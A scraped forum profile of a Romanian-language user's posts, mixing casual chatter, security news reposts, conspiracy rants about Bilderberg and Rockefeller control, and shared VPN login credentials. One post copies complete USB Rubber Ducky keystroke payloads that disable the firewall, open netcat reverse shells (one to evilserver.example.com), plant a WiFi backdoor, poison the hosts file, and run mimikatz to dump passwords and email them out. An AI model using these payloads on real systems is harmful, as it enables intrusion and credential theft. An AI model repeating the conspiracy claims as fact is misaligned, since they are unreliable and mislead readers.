ponta
Active Members-
Posts
118 -
Joined
-
Last visited
Everything posted by ponta
-
Ridica o piatra singur,va fi foarte greu ridico in mai multi va fi mult mai usoara,dupa parerea mea ar trebui sa cauti ascociati tu vrei sa faci bani doar pentru tine singur,daca vrei sa faci bani in adevaratul sens al cuvantului 10 mii usd este o suma minora,cauta asociati cu un capital ca al tau gen 10 dupa stabiliti un plan exemplu faceti un bloc de 4 etaje ceva de genul dupa care il vindeti si profiturile nu le inpartiti le investiti si incet incet ajungi undeva,Baiat destept nu este ala care stie sa faca bani ci cel ce stie ce sa faca cu bani.sau daca o ti una si buna cumpara gen 20 de masini de la licitiati online in belgia sau deplaseazate in franta germania la licitati si cumpara masini,sau cumparati 2 liciente de taxi si doua petarde de masini sau cumparati un bus sa faca naveta lumea cu el.
-
Eu locuiesc in pierrefitte sur seine unde a avut loc incidentul,In primul rand este inuman ce iau facut fie roman sau tigan,in al doilea rand nu a furat nimic e doar un copil de 16 ani nu a spart nici o casa nimic,cunosc si pe uni dintre cei ce au facut asta,sunt niste marocani,acum o luna si ceva mam dus pe acolo sa cumpar niste iarba (da fumez din cand in cand) si vb cu unul dintre marocani aia ma tot intreba de asta unde e unde da de el etc...si mia spus ca ia dat iarba de 500 de euro sa vanda si nu le.a mai adus nici iarba nici bani ia ars si mia spus ca osa vada el cand pune mana pe el,politia normal ca stie povestea oficiala ca si restul lumi dar adevarul este ca nu a spart nici o casa,si in acest moment chiar astazi de dimineatza am vorbit cu un gagan si a spus ca se strang acuma vre.o 40 de insi si zilele astea or sa se duca acolo la blocuri unde se vinde iarba si osa ai lesine pe toti,acum ceva timp un alt baiat a mai avut niste probleme cu niste arabi si sa dus cu 10 prieteni cu leviere si le au rupt picoarele bine nu la aia la alti,e trist ce sa zic ma intrista rau e doar un copil in fine.....
-
"Ce sa facem noi cu loveaua?". Moneda tiganeasca de pe internet (LOV)
ponta replied to zoondark's topic in Stiri securitate
) Asta da stire,osa se apuce de cersit lov virtual astia acum...osa arunce cu lov pe salam )) -
https://www.youtube.com/watch?v=89eg4KxCIt0
-
Ce sistem foloseste acest site sa te lase sa trimiti sms gratis?ei nu le platesc oare cum as putea face ceva de genul asta?
-
Am un vpn torguard nu il mai folosesc de ceva timp si cum sta debaga ma.m gandit sa il impart cu voi mai este valabil 2 luni si ceva,https://torguard.net/knowledgebase.php?action=displayarticle&id=36 Username: alinware Pass: crackthecode
-
Doi b?rba?i de na?ionalitate român?, care ar fi participat la organizarea unei ac?iuni sofisticate de fraud? prin interceptarea unor vânz?ri online, au fost aresta?i duminic? în Mississippi, anun?? un post de televiziune american. Ei au ajuns deja în fa?a instan?ei ?i risc? pedepse grele cu închisoarea. Potrivit site-ului postului local WJTV, Paul Moraru-Rogoza, în vârst? de 37 de ani, ?i Gicu Oprea, de 50 de ani, au fost prin?i în ora?ul Pearl, în urma unei anchete realizare de Poli?ia local? ?i de biroul Procurorului General al statuului Mississippi, Jim Hood. Ce doi români sunt acuza?i c? au participat la numeroase fraude informatice în cadrul c?rora victimele, care vizitau site-uri de cump?r?turi sau licita?ii online, precum Ebay ?i Craigslist, erau redirec?ionate c?tre site-uri fantom? care ar?tau similar cu cele accesate ini?ial ?i unde se efectuau tranzac?iile pentru produsele pe care victimele inten?ionau s? le cumpere. Presupu?ii vânz?tori comunicau via email cu victimele ?i le cereau s? transfere banii în conturile unor a?a-zi?i reprezentan?i ai site-urilor. Paul Moraru-Rogoza este judecat pentru 14 capete de acuzare privind frauda informatic? ?i unul pentru utilizarea frauduloas? a identit??ii unei alte persoane ?i risc? o pedeaps? de pân? la 75 de ani de închisoare (cinci ani pentru fiecare cap de acuzare), în timp ce Gicu Oprea, risc? s? petreac? 10 ani dup? gratii pentru dou? capete de acuzare. Presa local? le cere americanilor care ar putea avea mai multe informa?ii despre acesc caz s? se adreseze anchetatorilor. WTF cel de 50 de ani risca 75 de ani de inchisoare,ce oameni la 50 de ani ar fi trebuit sa stea langa nepoti nu prin Mississippi ! - sudo give me the sapun Sursa :https://ro.stiri.yahoo.com
-
-F?-mi un sandwich! -Nu, du-te s? ?i-l faci singur! -Sudo f?-mi un sandwich! -Imediat!
-
- 1
-
Watch Dogs înf??i?eaz? un viitor foarte sumbru cu un ora? interconectat, dar prima condamnare bazat? pe recunoa?tere facial? aduce acel concept în prezent. nec-neoface-facial-recognition recunoastere faciala software Am auzit de mai multe ori, în ultimii ani, în materiale de marketing sintagma ,,The Future is Now”. De?i uneori poate fi for?at?, exist? din ce în ce mai multe demonstra?ii ale vitezei cu care evolueaz? tehnologia. Pierre Martin e din Chicago, exact ora?ul în care se desf??oar? ac?iunea în Watch Dogs. Datorit? unui sistem de supraveghere destul de elaborat, în momentul unui jaf armat, Martin a fost imortalizat cu ajutorul unor camere de supraveghere. Aplicând ulterior un software de recunoa?tere facial? pe respectivul con?inut filmat, fa?a r?uf?c?torului a fost identificat? foarte rapid într-o baz? de date de 4,5 milioane de persoane. De?i nu putem decât s? b?nuim, anima?ia aferent? respectivei activit??i a fost probabil similar? cu cea pe care am v?zut-o de o mie de ori în filme. Pentru întregul scenariu, software-ul folosit a fost NEC NeoFace, descris în clipul de mai jos. În final a mai fost necesar? ?i o confirmare din partea unui martor pentru ca dosarul de condamnare s? fie complet, dar cea mai mare parte a cazului a fost solu?ionat? computerizat. Singura problem? cu aceast? poveste, pe lâng? faptul c? scoate la iveal? avantajele supravegherii în mas?, este c? func?ioneaz? doar dac? o persoan? se afl? deja în baza de date a diverselor agen?ii guvernamentale. A avut loc prima condamnare bazat? pe recunoa?tere facial? în SUA , 10.0 out of 10 based on 3 ratings Sursa : Gadget-uri, Tehnologie, Jocuri, Download, Tips&Tricks - playtech.ro
-
Merci,si mie ce imi trebuie ca sa ofer servici ca sip.cosmovoip.com?
-
Dar nu debitez nimic totul este adeverit grupul bilderberg este alcatuit din 130 de persoane si se intalnesc anual in tari diferite si toate intalnirile sunt super private la intalniri vin numai oameni puternici care conduc aceasta lume si crede.ma ca chiar i think outside the box !lumea nici macar nu stie ca barak obama este indonezian si ca pana la 10 ani a fost la o scoala religiuasa instlamisa,in fine scopul acestei grupari este sa domine planeta lucru ce lau reusit foarte bine pana acum prin televiziune care dreseaza populati prin tot felul de substante chimice continute in produse gen coca cola cipsuri mecdonalds etc.....problema lor este una singura suntem prea multi pe pamant si nu ne mai pot controla,iti dau un exemplu daca esti intr.o camera cu 300 de copii nu ai poti controla pe toti dar daca sunt decat 30 de copii atunci totul va fi mult mai simplu au inventat bani cecurile cartile de credit online banking tot ce este financiar controleaza finanta petrolul massmedia farmaceotica tot crede.ma ca vor reusi inceteaza sa crezi ca tara nuastra de exemplu este condusa de basescu,basescu conduce anumite chesti doar dar in spatele lui sta cineva mai mare care face ce vrea pe tot globul pamantesc,puneti o simpla intrebare de ce presedinti tuturor tarilor regina angliei etc..de ce fac parte din masonerie?ce treaba are un presedinte de stat sa faca parte dintr.o organizatie sau secta?citeam recent pe un sit englez presedintel frantei in ainte sa castige alegerile cu doua luni de zile a fost promovat mason de gradu 32 ! ia gandeste te de ce rusi vor sa faca Eurasian !!!si ia doua bacnote de 5 euro una vechie si una noua si uite.te pe ele si vezi daca gasesti vre.o diferenta ai sa opservi ca bancile care sunt inscrise pe baconta vechie sunt mai putine si pe bacontele noi sunt mult mai multe,de ce?care este scopul sa schimbi o bacnota de 5 euro si sa o inlocuiesti cu alta tot de 5 euro la fel.in fine fie care crede in ce vrea nu ma bazez pe consiprati de oameni nebuni ci pur si simplu vad realitatea cumpara ori ce produs industrial si uite te din ce este facut si ai sa vezi ca,cautand pe net incredientele respective unele sunt otravituare total in fine nu mai stau sa explic eu stiu prea bine ce se intampla si ce va urma fie care crede si face ce vrea el suntem liberi cu toti.
-
Nu fumez nici tigari,se pare ca esti gata sa primesti cipul.
-
Ok cunt incepator invat incet incet.
-
Nu este nici un fel de paranoia toul este adevarat grupul Bilderberg a fost creat de David Rockefeller Grupul este puternic exclusivist ?i se reune?te anual pentru a promova o apropiere între Europa ?i USA cam 180 de personalit??i politice, culturale, economice, universitare, ce se întrunesc în fiecare an în luna mai, alternativ în Europa ?i America,de fie care data in tari diferite Cercul exterior care este foarte extins; peste 80% din participan?ii la reuniuni fac parte din cercul exterior ?i nu cunosc decât o parte din strategiile ?i scopurile reale ale organiza?iei Comitetul director, este mult mai restrâns. Acest nivel este alc?tuit din aproximativ 35 de membri, exclusiv europeni ?i americani. Ace?tia cunosc în propor?ie de 90% obiectivele ?i strategia grupului. Membrii americani ai acestui nivel sunt de asemenea ?i membri în CRE – Consiliul pentru Rela?ii Externe Comitetul Consultativ Bilderberg, nucleul grup?rii. Este alc?tuit din 12 membri, singurii care cunosc în totalitate strategiile ?i scopurile reale ale organiza?iei,petrolul aurul graul materile prime sunt speculate in dolari cand irakul a anuntat ca vor sa speculeze petrolul in eruo o luna mai tarziu bang armata ia invadat siria a facut acelas lucru bang ia invadat,voi chiar credeti ca basescu conduce romania?sau ca obama conduce romania sa fim seriosi familia rockefeller detin monopolul sanatati tot ei lau finantat pe Hitler detin toate televiziunile din lume toate marcile mari david rockefeller a declarat ca au nevoie de o societate de muncitori nu de oameni care sa gandeasca problema este ca suntem 7 miliarde (cu aproximatie)si nu mai pot sa tina controlul de aceia populatia va trebui redusa la un sfert. Ok sunt paranoiac sa spun ia sa vedem acum cate va mici exemple cuvantul CARD citit invers ce insemna?DRAC cuvantul EVIAN invers ce insemna?NAIVE si nu mai stau sa dau alte exemple cine a inventat cardyurile cipurile etc?familia rockefeller este in spate la tot cand un copil plange si nu te lasa in pace sa poti sta linistit ce faci ai dai jucarile si tace il ti ocupat cam asa ceva se intampla si cu noi ne tin ocupati prin facebook iphone etc ati calculat vre.o data cat timp din viatza petreceti pe facebook intr.un an?sau pe telefon?o simpla problema daca dolarul se prabuseste toata industria petrolului graului sanatati cand o data cu dolarul,stiati ca coca cola detine 90 la suta din izvoarele de apa potabila din lume?cand au inceput razboiul in irak au spus ca este din cauza atentatelor care au facut 2700 de morti dar razboiul din irak a facut 5 milioane si ceva de morti din care peste 500 de mii de copii toate bazele mama din irak au fost instalate pe puncte strategice unde sa aflau resele de petrol cele mai mari,au facut o mare campanie spunand ca femeile ar trebui sa aiba aceleas drepturi ca barbati au facut mare dezbatere pe problema asta dreptul femei si oile au iesit pe strada sa incurajze statul safie egalitate intre barbati si femei,care a fost scopul?pur si simplu nu puteau sa impuna aceleas impozite femeilor dupa ce femeile au ajuns la egalitate cu barbati statul a facut un benificiu si face anual de x miliarde de dolari pe baza asta,sa nu credeti ca telefoanele cartile de credit etc au fost inventate pentru binele omeniri sau tot ce se face se face spre binele nostru,toate laptopurile din lume care sunt noi dupa ce il cumperi ajungi acasa il aprinzi si ghici ce iti face poza direct si le trimite pe servarele.le lor cu pozitia unde a fost aprins leptopul si poza ta,am un amic care lucreaza la macdonald si care mia spus ca,cand treci pe langa macdonald si miroase frumos de fapt un difuzoare de mirosuri care pulberizeaza mirsuri in aier la un interval de timp in fine cert este ca osa vedem cu toi adevarul si credeti.ma va fi grava situatia in fine ar mai fi multe de spus dar am sa ma opresc cine are ochi sa vada si urechi sa auda
-
create an FTP script that logs you in to the FTP server and download netcat delete the FTP script file run netcat in daemon mode run cmd.exe one more time to conceal the command we used in the run history. Fill in the required information where you see the brackets. DELAY 10000 GUI R DELAY 200 STRING cmd ENTER DELAY 600 STRING cd %USERPROFILE% ENTER DELAY 100 STRING netsh firewall set opmode disable ENTER DELAY 2000 STRING echo open [iP] [PORT] > ftp.txt ENTER DELAY 100 STRING echo [uSERNAME]>> ftp.txt ENTER DELAY 100 STRING echo [PASSWORD]>> ftp.txt ENTER DELAY 100 STRING echo bin >> ftp.txt ENTER DELAY 100 STRING echo get nc.exe >> ftp.txt ENTER DELAY 100 STRING echo bye >> ftp.txt ENTER DELAY 100 STRING ftp -s:ftp.txt ENTER STRING del ftp.txt & exit ENTER DELAY 2000 GUI R DELAY 200 STRING nc.exe [listENER IP] [listENER PORT] -e cmd.exe -d ENTER DELAY 2000 GUI R DELAY 200 STRING cmd ENTER DELAY 600 STRING exit ENTER Payload reverse shell Author: Darren Kitchen with mad props to IllWill dabermania.blogspot.com/2011/04/copying-executable-from-teensy-using.html Duckencoder: 1.0 Target: Windows 7 Description: Opens administrative CMD prompt, creates decoder.vbs containing code to convert base64 encoded ascii to binary, creates text file including base64 ascii of binary file to create reverse shell. converts second file to exe with first file. Executes with host and port parameters. Props to go illwill for this payload. See dabermania.blogspot.com/2011/04/copying-executable-from-teensy-using.html ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\reverse.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER STRING c:\reverse.exe evilserver.example.com 8080 ENTER STRING exit ENTER Payload wifi backdoor Author: Darren Kitchen Duckencoder: 1.0 Target: Windows 7 Description: Open a CMD bypassing UAC then create a wireless access point with the SSID noobcake and WPA key 12345678, then lower firewall. CONTROL ESCAPE DELAY 200 STRING cmd DELAY 200 MENU DELAY 100 STRING a DELAY 100 LEFTARROW ENTER DELAY 200 STRING netsh wlan set hostednetwork mode=allow ssid=noobcake key=12345678 ENTER DELAY 100 STRING netsh wlan start hostednetwork ENTER DELAY 100 STRING netsh firewall set opmode disable ENTER STRING exit ENTER Payload local dns poisoning The following is a local DNS poisoning attack that changes a hosts host file. The host will then be redirected to the website of your choice (IP Address), every time the user types in the given domain name in their browser. REM Author:ashbreeze96 and overwraith GUI R STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER DELAY 50 STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS DELAY 50 ENTER DELAY 50 STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS DELAY 50 ENTER STRING exit ENTER Payload download mimikatz, grab passwords and email them via gmail This payload: 1. Downloads appropriate mimikatz version via http (I used dropbox) 2. Opens a admin prompt 3. saves mimikatz log to file 4. emails log via gmail please change these lines to something (keep the single quote): 'url to 32bit mimikatz.exe' 'url to 64bit mimikatz.exe' 'gmailuser', 'gmail password' 'sending email account' 'email account to send report' Sorry about the wacky delays! REM Author: Pesce REM Date: 10/20/2013 REM Note: Thanks to all the help everyone! This is my first attempt, don't be to upset! REM -------------open command prompt with admin privileges DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y ENTER DELAY 300 REM -------------download appropriate mimikatz for architecture STRING powershell if ([system.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('http://url to 32bit mimikatz.exe','%TEMP%\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('http://url to 64bit mimikatz.exe','%TEMP%\pw.exe');} ENTER DELAY 5000 REM -------------get the passwords and save to c:\pwlog.txt STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt; ENTER DELAY 2000 STRING privilege::debug ENTER DELAY 1000 STRING sekurlsa::logonPasswords full ENTER DELAY 1000 STRING exit ENTER DELAY 300 STRING del %TEMP%\pw.exe ENTER DELAY 300 REM -------------email log via gmail STRING powershell ENTER DELAY 300 STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('gmailuser', 'gmail password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'sending email account' ENTER STRING $ReportEmail.To.Add('email account to send report') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('c:\pwlog.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 1000 STRING exit ENTER REM ---------------------delete and end STRING del c:\pwlog.txt ENTER DELAY 300 STRING exit ENTER Sursa : https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
-
Ma tot gandesc de ceva timp oare cum functioneaza skype,ei platesc apelurile catre telefoanele mobile?eu nu as putea sa imi fac un sistem asemanator pentru propria utilizare gen sa pot suna de pe pc pe mobile gratis?
-
Everything we do online, whether chatting on phone, talking via video or audio, sending messages on phones or emails are being watched by Governments and Intelligence agencies. However, many Internet giants offer encrypted environment in an effort to protect our online data from prying eyes, but still those companies can read our data stored into their servers. But, there is a great news for Gmail users. On Tuesday, Google has announced two major privacy enhancements in its Gmail and this new push for its email service will even protect our data and communication from Google itself. With the ongoing concerns about privacy and the pervasiveness of email communications, Google already provides encryption for its Gmail called Transit encryption (HTTPS). In which only the transmission of emails sending or receiving is protected by the transit encryption but not the content of the email. Few Months back, Google itself admitted that their automated systems read our email content, including incoming and outgoing emails to provide us targeted advertisements. That means Internet giants generally do encrypt our data, but they have the key so they can decrypt it any time they want. Google also today released its first email encryption transparency report, and in new section called Safer Email, Google describes a world of webmail where only about 40 to 50 percent of all emails sent are unencrypted from server to server (eg. Gmail to Yahoo), because Transit encryption does work only and only if both the sending and receiving service agree to use it. But if your email client may have not agreed to use it, your contents of the email are vulnerable to being read. gmail end to end encryption In our previous article, we reported about the company’s plan to ensure its users Privacy by implementing more complex encryption tools, the secure email encryption standard known as Pretty Good Privacy (PGP) and finally, it has launched a new Chrome extension called End-to-End for sending and receiving emails securely. PGP is an open source end-to-end encryption standard for almost 20 years, used to encrypt e-mail over the Internet providing cryptographic privacy and authentication for data communication, which makes it very difficult to break. So, bringing PGP to the Gmail service will result in a much stronger end-to-end encryption for emails. PGP tool is too complicated for most of the people to use, but this new ‘End-to-End’ Google Chrome extension will make it easier for individuals to implement the tough encryption standard. “While end-to-end encryption tools like PGP and GnuPG have been around for a long time, they require a great deal of technical know-how and manual effort to use. To help make this kind of encryption a bit easier, we’re releasing code for a new Chrome extension that uses OpenPGP, an open standard supported by many existing encryption tools,” reads the blog post. You won't find End-to-End n the Chrome Web Store for a while, but soon Google is most likely to release its new Chrome extension, as the company says it is “just sharing the code today so that the community can test and evaluate it, helping us make sure that it’s as secure as it needs to be before people start relying on it.” For now, Google is just asking users to test the End-to-End extension code and offering financial rewards of tens of thousands of dollars to find any security bugs under its Vulnerability Reward Program. The developers must compile themselves before testing. Google said that once End-to-End is found out to be secure enough for its users, the company will make the extension available through the Chrome Web Store as a free add-on. Sursa :http://thehackernews.com/
-
A recent ATM skimming attack in which thieves used a specialized device to physically insert malicious software into a cash machine may be a harbinger of more sophisticated scams to come. Two men arrested in Macau for allegedly planting malware on local ATMs. Two men arrested in Macau for allegedly planting malware on local ATMs (shown with equipment reportedly seized from their hotel room). Authorities in Macau — a Chinese territory approximately 40 miles west of Hong Kong — this week announced the arrest of two Ukrainian men accused of participating in a skimming ring that stole approximately $100,000 from at least seven ATMs. Local police said the men used a device that was connected to a small laptop, and inserted the device into the card acceptance slot on the ATMs. Armed with this toolset, the authorities said, the men were able to install malware capable of siphoning the customer’s card data and PINs. The device appears to be a rigid green circuit board that is approximately four or five times the length of an ATM card. According to local press reports (and supplemented by an interview with an employee at one of the local banks who asked not to be named), the insertion of the circuit board caused the software running on the ATMs to crash, temporarily leaving the cash machine with a black, empty screen. The thieves would then remove the device. Soon after, the machine would restart, and begin recording the card and PINs entered by customers who used the compromised machines. The Macau government alleges that the accused would return a few days after infecting the ATMs to collect the stolen card numbers and PINs. To do this, the thieves would reinsert the specialized chip card to retrieve the purloined data, and then a separate chip card to destroy evidence of the malware. Here’s a look at the devices that Macau authorities say the accused used to insert the malware into ATMs (I’m working on getting clearer photos of this hardware) sursa : Krebs on Security
-
Andrei Alexandrescu este un programator ?i autor român. El este considerat unul dintre cei mai sofisitca?i exper?i români în programarea in C++[1]. Printre meritele sale se num?r? munca sa în policy-based design ?i template metaprogramming. Ideile sale au fost descrise pe larg în cartea sa Modern C++ Design (Addison-Wesley, 2001, ISBN 0-201-70431-5) ?i au fost implementate în biblioteca de func?ii C++ Loki. Într-o alt? bibliotec? de func?ii C++, MOJO, el a implementat conceptul de "move constructor" [2]. El a scris articole pentru sec?iunea "Generic<Programming>" din revista C/C++ Users Journal. În 2010, Alexandrescu este angajat ca cercet?tor la Facebook. Împreun? cu Walter Bright, Alexandrescu lucreaz? la noul limbaj de programare, D, despre care cei doi au publicat o carte, The D Programming Language (Addison-Wesley, 2010) Stiloul a fost inventat de romanul Petrache Poenaru Mai precis, tocul cu rezervor, cum i se spunea atunci. Inven?ia sa a fost brevetat? în 1827 la Viena ?i Paris. Înainte de inven?ia tocului cu rezervor, tocurile de scris se înmuiau în cerneal? dup? doar câteva cuvinte scrise. Ulterior, tocul cu rezervor inventat de el va fi îmbun?t??it pentru a se ajunge la varianta stiloului modern. Pe lâng? inven?ia sa, îns??i via?a lui Petrache Poenaru a fost una interesant?. În tinere?e, el a fost haiduc ?i apoi pandur în oastea lui Tudor Vladimirescu timp de câteva luni. Absolvent de ?coal?, el este imediat remarcat de Vladimirescu pentru inteligen?a de care d? dovad? ?i devine rapid omul de încredere al acestuia. La îndemnul lui Vladimirescu, el pleac? s? studieze ingineria la Paris. Poenaru este ?i primul român care a c?l?torit cu trenul, în 1830 în Anglia, la inaugurarea primei linii de cale ferat? din lume, cea care lega ora?ele Liverpool ?i Manchester. În domeniul educa?iei, Poenaru a fost implicat în numeroase proiecte pedagogice ?i a devenit membru al Academiei Române. Primele m?sur?ri meteorologice din Bucure?ti s-au f?cut sub coordonarea sa iar ca pedagog s-a f?cut remarcat ca director de ?coal? ?i profesor de fizic? ?i matematic?. ?tefan ODOBLEJA p?rintele ciberneticii ?tefan Odobleja a r?mas în istoria ?tiin?ei ca precursorul ciberneticii, având meritul priorit??ii mondiale absolute în ceea ce prive?te cibernetica generalizat?, cu aplicare în toate ramurile ?tiin?ei. Lucrarea sa cea mai important?, "Psihologia consonatist?" (884 pagini), ap?rut? în 2 volume în anii 1938 ?i 1939, a constituit o revolu?ie în gândirea ?tiin?ific? prin introducerea ?i aplicarea ideilor de baz? ale ciberneticii generalizate, dintre care cea mai remarcabil? este cea de feed-back sau conexiunea invers?. Medicul ?tefan Odobleja, creatorul psihociberneticii ?i p?rintele ciberneticii generalizate s-a n?scut la 13 octombrie 1902 în casa unor ??rani s?raci ?i ne?tiutori de carte din comuna Izvorul Ane?tilor, jude?ul Mehedin?i. A f?cut liceul la Drobeta Turnu-Severin ?i facultatea la Bucure?ti ca bursier al Institutului medico-militar. Ca medic militar ?i-a exercitat func?iile profesionale în diferitele garnizoane din Br?ila, Severin, Lugoj, Târgovi?te, Bucure?ti, Dej ?i în alte ora?e. Public? în 1929 studiul "Metoda de transonan?? toracic?" în care el enun?? pentru prima oar? legea reversibilit??ii. Ob?ine premiul "General doctor Papiu Alexandru" cu lucrarea "La phonoscopie" ap?rut? la Paris. Odat? cu participarea sa la Congresul Interna?ional de Medicin? Militar? din Bucure?ti (1937) anun?? apari?ia operei sale capitale "Psihologia consonantist?", lucrare prin care a f?cut public? prima variant? a concep?iei cibernetice generalizate ?i a demonstrat caracterul multi ?i interdisciplinar al acesteia. Modelul cibernetic, pornind de la observa?ii, intui?ie ?i ra?ionalitate, creat în fond de Odobleja în 1938-1939 dar vehiculat (dupa cum se ?tie), zece ani mai târziu, în literatura american? ?i apoi în cea european? a fost utilizat ?i aplicat la o varietate de domenii. Începând din anul 1972, când a citit autobiografia lui Norbert Wiener, ?tefan Odobleja s-a consacrat demonstr?rii ideii c? originea ciberneticii se afl? în psihologie. Pentru a-?i marca paternitatea el a publicat o lucrare special? "Psihologia consonantist? ?i cibernetica".
-
Asta da conectiune securizata,eu folosesc torguard am platit pe un an din pacate,va trebui sa refac tot sistemul.
-
Multiple flaws have been identified in Linux Kernel and related software could allow hackers to hack your Linux machines, shared hosting and websites hosted on them. PRIVILEGE ESCALATION VULNERABILITY IN LINUX KERNEL A privilege escalation vulnerability has been identified in the widely used Linux kernel that could allow an attackers to take the control of users’ system. On Thursday, the most popular distributor of open source Linux OS, Debian warned about this vulnerability (CVE-2014-3153) in a security update, along with some other vulnerabilities in the Linux kernel that may lead to a denial of service attack. The most critical one is the flaw (CVE-2014-3153) discovered by Pinkie Pie which resides in the futex subsystem call of Linux Kernel 2.6.32.62/3.2.59/3.4.91/3.10.41/3.12.21/3.14.5 versions, leaving a queued kernel waiter on the stack, which can be exploited to potentially execute arbitrary code with kernel mode privileges. "Pinkie Pie discovered an issue in the futex subsystem that allows a local user to gain ring 0 control via the futex syscall," reads the advisory. "An unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation." Pinkie Pie is the anonymous teenage ethical and skilled hacker who scooped at least $100,000 for bypassing the security features of Google's Chrome, many of them sandbox exploits, at both Pwnium and Pwn2Own competitions every year since 2012. RESEARCHER’S ADVICE Kees Cook, a Google Chrome OS security researcher and Ubuntu contributor said that the latest flaw found by Pinkie Pie is "urgent to fix." "Specifically, the futex syscall can leave a queued kernel waiter hanging on the stack. By manipulating the stack with further syscalls, 